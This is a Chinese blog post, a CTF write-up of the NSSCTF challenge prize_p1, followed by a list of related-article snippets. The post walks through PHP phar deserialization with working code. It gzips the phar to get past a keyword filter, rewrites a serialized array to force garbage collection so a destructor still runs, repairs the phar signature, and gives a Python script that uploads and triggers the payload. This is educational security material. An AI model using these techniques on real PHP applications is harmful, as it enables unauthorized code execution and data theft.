记一道CTF中的phar反序列化

已于 2022-08-15 08:23:03 修改
阅读量2.2k 收藏 7
点赞数
文章标签: php servlet web安全
于 2022-08-14 16:45:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53886354/article/details/126333147
版权

Author: takahashi

提要

        最近这段时间恍恍惚惚有点不知道干嘛, 想着闲来无事不如去做两道CTF,于是有了此文。记录一下自己做题的思路过程以及遇到的一些问题, 有不对不足之处还望师傅们斧正。

        思路上参考了atao, xenny两位师傅的WriteUp。 题目出的很棒, 学到了很多东西!

        平台: NSSCTF

        题目名:prize_p1

开始做题咯~

        打开环境, 映入眼帘的就是源码

<META http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
highlight_file(__FILE__);
class getflag {
    function __destruct() {
        echo getenv("FLAG");
    }
}

class A {
    public $config;
    function __destruct() {
        if ($this->config == 'w') {
            $data = $_POST[0];
            if (preg_match('/get|flag|post|php|filter|base64|rot13|read|data/i', $data)) {
                die("我知道你想干吗,我的建议是不要那样做。");
            }
            file_put_contents("./tmp/a.txt", $data);
        } else if ($this->config == 'r') {
            $data = $_POST[0];
            if (preg_match('/get|flag|post|php|filter|base64|rot13|read|data/i', $data)) {
                die("我知道你想干吗,我的建议是不要那样做。");
            }
            echo file_get_contents($data);
        }
    }
}
if (preg_match('/get|flag|post|php|filter|base64|rot13|read|data/i', $_GET[0])) {
    die("我知道你想干吗,我的建议是不要那样做。");
}
unserialize($_GET[0]);
throw new Error("那么就从这里开始起航吧");

        简单过一遍代码可以看到在倒数第二行有一个unserialize反序列化的函数,继续审计代码可以发现主要利用点在file_get_contents和file_put_contents两个函数上面。再往上看可以看到最终要打的内容, 通过getflag类中的__destruct魔术方法拿到flag。

        理完一遍思路之后重新审计一下代码

class A {
    public $config;
    function __destruct() {
        if ($this->config == 'w') {
            $data = $_POST[0];
            if (preg_match('/get|flag|post|php|filter|base64|rot13|read|data/i', $data)) {
                die("我知道你想干吗,我的建议是不要那样做。");
            }
            file_put_contents("./tmp/a.txt", $data);
        } else if ($this->config == 'r') {
            $data = $_POST[0];
            if (preg_match('/get|flag|post|php|filter|base64|rot13|read|data/i', $data)) {
                die("我知道你想干吗,我的建议是不要那样做。");
            }
            echo file_get_contents($data);
        }
    }
}

        通过config的值去控制文件读写, 审计一下正则发现基本上把伪协议都过滤了, 直接new getflag也不行,这种情况下十六进制类名也绕不了,再仔细审计一下发现虽然phar伪协议没有作限制。但是对类名作了过滤, 这个时候我就没什么思路了。

Phar混淆

        找了会儿资料但是没什么思路, 只能去求救大佬。 去问了个牛纸, 他给我推了篇文章, 大致原理就是用其他的压缩格式再对phar文件进行压缩达到混淆的效果, 部分压缩格式混淆过的phar内容同样可以直接被phar://伪协议解析。

事不宜迟, 写个脚本生成phar文件

<?php

    @unlink("takahashi.phar");   // unlink() 删除文件

    class getflag{

    }
		$a = new getflag();
    $phar = new Phar("takahshi.phar"); 
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>");
    $phar -> setMetadata($a);
    $phar->addFromString("1.txt", "123"); 
    $phar->stopBuffering();
?>

        然后用gzip压缩

        然后写个脚本上传一下

import requests

url = ""

phar = open("takahashi.phar.gz", "rb")

sentData = {
    0: phar.read()
}

phar.close()

requests.post(url=url + '?0=O:1:"A":1:{s:6:"config";s:1:"w";}', data=sentData)

response = requests.post(url=url + '?0=O:1:"A":1:{s:6:"config";s:1:"r";}', data={0: "phar://./tmp/a.txt"})
print(response.text)

        但是运行之后却没有flag, 本地调试的时候发现phar反序列化结束后会提前被最后一行的异常抛出给强行终止程序运行, 导致__destruct无法成功执行。

throw new Error("那么就从这里开始起航吧");

PHP强制GC绕过

        这一块实在是没什么思路去绕过, 于是参考了一下xenny和atao两位师傅的wp, 此处用的是xenny师傅的思路, 修改文件内容 -> 签名修复 -> 文件上传。

        atao师傅用的思路是上面文章里面的第二种方法, 这边就顺着我最初的思路延伸继续用gzip。atao师傅讲的也是真的不错, 对里面的内容进行了补充。

针对PHP的GC内容此处不多赘述, 如果对此知识点不是很熟悉可以看看这几篇文章:

php的垃圾回收机制(gc)_m313557552的博客-CSDN博客

php垃圾回收机制(gc)介绍

PHP垃圾回收机制(GC) - 欢乐豆123 - 博客园

构造一下替换的内容

<?php
	
	class getflag{
	}


	$a = array(new getflag(), 1);
	echo serialize($a);
	echo str_replace("}i:1;", "}i:0;", serialize($a));
	
?>

        分析一下POC, 首先创建了一个有2个元素的数组, 序列化结果如下:

// 蓝色字体代表元素在数组中的位置, 红色字体代表元素值

a:2:{i:0;O:7:"getflag":0:{}i:1;i:1;}

使用替换函数后生成的结果如下

a:2:{i:0;O:7:"getflag":0:{}i:0;i:1;}

        可见第二个元素移动到了第一个元素的位置, O:7:"getflag":0:{}失去了引用, 被PHP强制回收从而销毁对象触发__destruct()魔术方法。

修复文件签名

        在二次复现时发现直接对文本内容修改然后用X尼师傅的脚本跑发现修复后的文件后八位值会改变, 建议重新生成phar文件然后用winhex或010等工具修改十六进制。

<?php
    @unlink("test.phar");
    class getflag{

    }
		// 创建一个数组
    $a = array(new getflag(), 1);
    $phar = new Phar("test.phar");
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>"); 
    $phar -> setMetadata($a);
    $phar->addFromString("1.txt", "123"); 
    $phar->stopBuffering();
?>

        然后修复文件签名, 这边贴一下X尼师傅的脚本

from hashlib import sha1
f = open('test.phar', 'rb').read()  # 修改内容后的phar文件
s = f[:-28]  # 获取要签名的数据
h = f[-8:]  # 获取签名类型以及GBMB标识
newf = s+sha1(s).digest() + h  # 数据 + 签名 + 类型 + GBMB
open('takahashi.phar', 'wb').write(newf)  # 写入新文件

        修复后使用gzip压缩一下上传成功拿到flag。

import requests


url = ""
phar = open("test.phar.gz", "rb")


requests.post(url=url + '?0=O:1:"A":1:{s:6:"config";s:1:"w";}', data={0: phar.read()})
phar.close()

response = requests.post(url=url + '?0=O:1:"A":1:{s:6:"config";s:1:"r";}', data={0: "phar://tmp/a.txt"})
response.encoding = "utf-8"
print(response.text)

takahash1
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
php代码-ctf payload 第九题 反序列化 do you know robot
phar反序列化+两道CTF例题
unexpectedthing的博客
02-14 6121
Phar反序列化 phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。(漏洞利用点) 什么是phar文件 在软件PHARPHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件来实现应用程序和库的分发 php通过用户定义和内置的“流包装器”实现复杂的文件处理功能。内置包装器可用于文件系统函数,如(fopen(),copy(),file
PHP Phar反序列化总结
Love&Share
10-18 4056
利用phar文件会以序列化的形式存储用户自定义的meta-data这一特性,拓展php反序列化漏洞的攻击面,这篇文章来总结下ctf遇到的phar的利用和绕过方式 Phar文件结构 phar文件是php里类似于JAR的一种打包文件本质上是一种压缩文件,在PHP 5.3 或更高版本默认开启,一个phar文件一个分为四部分 1.a stub 可以理解为一个标志,格式为xxx<?php xxx; __HALT_COMPILER();?>,前面内容不限,但必须以__HALT_COMPILER()
phar反序列化
m0_62709637的博客
09-30 562
ctf-反序列化phar反序列化
prize_p1
m0_60716947的博客
10-27 1094
这道题东西真的很多,看了大佬的wp学到了不少,几个笔录一下。
[NSSCTF]prize_p1~p5五道题学习
m0_62422842的博客
08-11 1836
五道web题涉及到的知识点也比较多,总结一下便于今后学习
tsqlphpunserialize:在 T-SQL 反序列化 PHP 序列化数据
06-13
tsqlphpunserialize 在 T-SQL 反序列化 PHP 序列化数据最初发布在 Stack Exchange 上: : noredirect=1# 我正在尝试从 Magento 订单提取礼品卡代码。 其他一些代码使用 Magento API 从 Magento 检索订单信息作为...
攻防世界序列化问题详解.md
09-12
攻防世界,序列化问题
CTF-java反编译工具id-gui
11-01
由于Java、.net这样的基于虚拟机技术的语言都是采用了ByteCode的二进制结构,因此很容易将ByteCode转化为“抽象语法树”(简称AST,《编译原理》这门课的概念),然后采用反编译器就可以将AST转换为代码了。
phar反序列化&&复现bytectf_2019_easycms
a3320315的博客
11-04 769
0x01 参考链接 为了表示尊重,先放出大部分内容的参考链接 链接 0x02 原理讲解 phar的本质是一种压缩文件,其每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data,这是上述攻击手法最核心的地方 根据文件结构我们来自己构建一个phar文件,php内置了一个Phar类来处理相关操作 注意:要将php.iniphar.readonly...
CTF反序列化练习
ZhangAweio的博客
04-17 167
看到间的我我们只需要构造 admin = admin passwd = wllm就可以得到flag。绕过的姿势,只要是成员大于原来的成员都可以绕过这个函数,不会优先执行,很显然是错的答案,那我们试着寻找里面的哪个。那我们就要构造php反序列化。但是这题输出的既然是。
[BMZCTF]-phar??
cjdgg的博客
05-24 715
[BMZCTF]-phar?? 进入题目后,根据源代码的提示,可以发现两个页面 在include.php根据页面的提示,应该是存在文件包含的,这里随便包含了一个文件试试,根据报错不难看出确实是存在文件包含漏洞 ...
[SWPUCTF 2018]SimplePHP phar漏洞及其文件上传
qq_54929891的博客
03-27 3206
在查看文件这个页面发现一个可疑参数file,试试能不能读取源代码 根据include包含来将各个文件源代码都提取出来,最重要的是class.php <?php class C1e4r { public $test; public $str; public function __destruct() { $this->test = $this->str; echo $this->test; } } ..
CTFshow 反序列化 web275
Kradress的博客
02-12 383
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-08 19:13:36 # @Last Modified by: h1xa # @Last Modified time: 2020-12-08 20:08:07 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ highlight_file(__FILE__); c
原理+实践掌握(PHP反序列化和Session反序列化)
bylfsj的博客
03-22 1635
<p></p><h2 id="toc-0">前言:</h2> 最近又接触了几道php反序列化的题目,觉得对反序列化的理解又加深了一点,这次就在之前的学习的基础上进行补充。 0x00:PHP序列化 函数 : serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表...
[phar反序列化][NSSCTF]prize_p1
cosmoslin的博客
10-16 1172
prize_p1 考点:phar反序列化 <META http-equiv="Content-Type" content="text/html; charset=utf-8" /> <?php highlight_file(__FILE__); class getflag { function __destruct() { echo getenv("FLAG"); } } class A { public $config; function
NSSCTF web
m0_64815693的博客
11-08 9173
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
CTF reverse
最新发布
12-25
CTF reverse(CTF逆向工程)是指在CTF竞赛涉及到的逆向分析和破解技术。逆向工程是通过对软件进行反汇编、反编译等操作,来理解其内部结构和实现原理的过程。在CTF reverse,参赛选手需要具备较强的逆向分析能力,能够通过逆向分析来猜测软件的功能和实现思路,并进行验证。 CTF reverse的主要目标是解决给定的逆向工程问题,例如破解密码、还原加密算法、分析恶意软件等。参赛选手需要使用逆向工程技术来分析和理解给定的程序或者二进制文件,找出其隐藏的信息和漏洞,并利用这些信息来解决问题。 在CTF reverse,常用的工具包括IDA Pro、OllyDbg、Ghidra等。参赛选手可以使用这些工具来进行反汇编、反编译、调试等操作,以便深入理解程序的运行机制和逻辑。 总结起来,CTF reverse是一项需要逆向分析能力的竞赛项目,参赛选手通过对软件进行逆向工程来解决给定的问题。这需要他们具备扎实的逆向分析技术和对计算机系统的深入理解。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值